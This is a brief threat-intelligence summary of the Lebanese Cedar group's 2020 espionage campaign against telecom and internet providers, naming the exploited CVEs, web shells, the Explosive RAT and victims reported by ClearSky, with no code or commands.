Cyber Incident Victim: National Information Technology Center

The Lebanese Cedar threat group, affiliated with Hezbollah's cyber unit, conducted a year-long hacking campaign beginning in early 2020 targeting telecommunications providers and internet service providers across multiple countries. Israeli cybersecurity firm ClearSky discovered the campaign, identifying at least 250 compromised web servers globally. Attackers initiated operations by scanning the internet for unpatched Atlassian Confluence, Atlassian Jira, and Oracle Fusion servers, exploiting known vulnerabilities including CVE-2019-3396, CVE-2019-11581, and CVE-2012-3152 to gain initial access. Upon breaching external systems, operators deployed web shells such as ASPXSpy, Caterpillar 2, Mamad Warning, and a modified JSP file browser tool to maintain persistence. The campaign's primary objective centered on intelligence gathering and theft of sensitive databases, with telecommunications companies' call records and customer data identified as high-value targets.

After establishing footholds in internet-facing systems, attackers pivoted to internal networks where they deployed the Explosive remote access trojan (RAT), a tool historically exclusive to Lebanese Cedar operations. This malware facilitated systematic data exfiltration of private corporate documents. Operational security lapses by the attackers, including file reuse across intrusions, enabled ClearSky to attribute the campaign through digital fingerprints and hash matching across 135 infected servers. Confirmed victims included Vodafone Egypt, Etisalat UAE, SaudiNet, and US-based Frontier Communications. The security firm's incident response investigation revealed no evidence of disruptive payload deployment, indicating purely espionage-motivated activity. ClearSky's analysis provided sectoral and geographical targeting patterns but did not disclose specific containment measures taken by affected organizations beyond the discovery methodology.